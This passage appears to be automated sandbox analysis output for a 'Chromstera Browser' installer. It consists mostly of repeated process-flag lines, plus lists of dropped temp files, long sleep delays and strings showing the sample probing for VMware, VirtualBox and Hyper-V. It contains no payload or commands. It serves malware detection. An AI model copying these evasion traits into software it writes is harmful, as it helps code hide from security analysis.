                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSI4739.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000F02B08_2_000F02B0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4082Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4615Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6014
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2232
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5887
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1951
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI331F.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\viewer.exeJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi3105.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICA7D.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIEC26.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICBB9.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI32EF.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiC6A3.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3193.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID11C.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSID04F.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\lzmaextractor.dllJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3517.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3290.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICB79.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICAEB.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3340.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI35A6.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3230.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC933.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3566.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC9EF.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI11D0.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI32CF.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI35E5.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3250.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI3360.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI34E7.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\aischeduler2.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICC66.tmpJump to dropped file
                      Source: C:\Windows\Installer\MSIFB77.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\Installer\MSI4739.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Users\user\Desktop\setup.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-45269
                      Source: C:\Users\user\Desktop\setup.exeAPI coverage: 5.7 %
                      Source: C:\Users\user\Desktop\setup.exeAPI coverage: 5.5 %
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeAPI coverage: 4.5 %
                      Source: C:\Windows\Installer\MSI4739.tmpAPI coverage: 5.1 %
                      Source: C:\Windows\Installer\MSIFB77.tmpAPI coverage: 4.3 %
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000F02B08_2_000F02B0
                      Source: C:\Users\user\Desktop\setup.exe TID: 7424Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 4082 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep count: 4615 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8032Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 6014 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep count: 2232 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 332Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1860Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664Thread sleep count: 5887 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep count: 1951 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7680Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 3468Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\timeout.exe TID: 2344Thread sleep count: 45 > 30
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCBDA0 FindFirstFileW,GetLastError,FindClose,0_2_00CCBDA0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BC2290 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,_wcsrchr,_wcsrchr,PathIsUNCW,0_2_00BC2290
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCB3A0 _wcsrchr,_wcsrchr,FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,_wcsrchr,0_2_00CCB3A0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCB7D0 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,GetFileAttributesW,FindNextFileW,0_2_00CCB7D0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_000DEAA0 GetLastError,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindClose,8_2_000DEAA0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00184E5C FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00184E5C
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D7D0F2 VirtualQuery,GetSystemInfo,0_2_00D7D0F2
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: MSIFB77.tmp, 00000036.00000003.2838702310.000001567CDE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                      Source: setup.exe, 00000000.00000003.1717180600.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1716043563.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2315981321.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2950970650.0000000003C6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                      Source: Chromnius-Main.msi.0.drBinary or memory string: HKEY_USERSRegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1VMware20,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
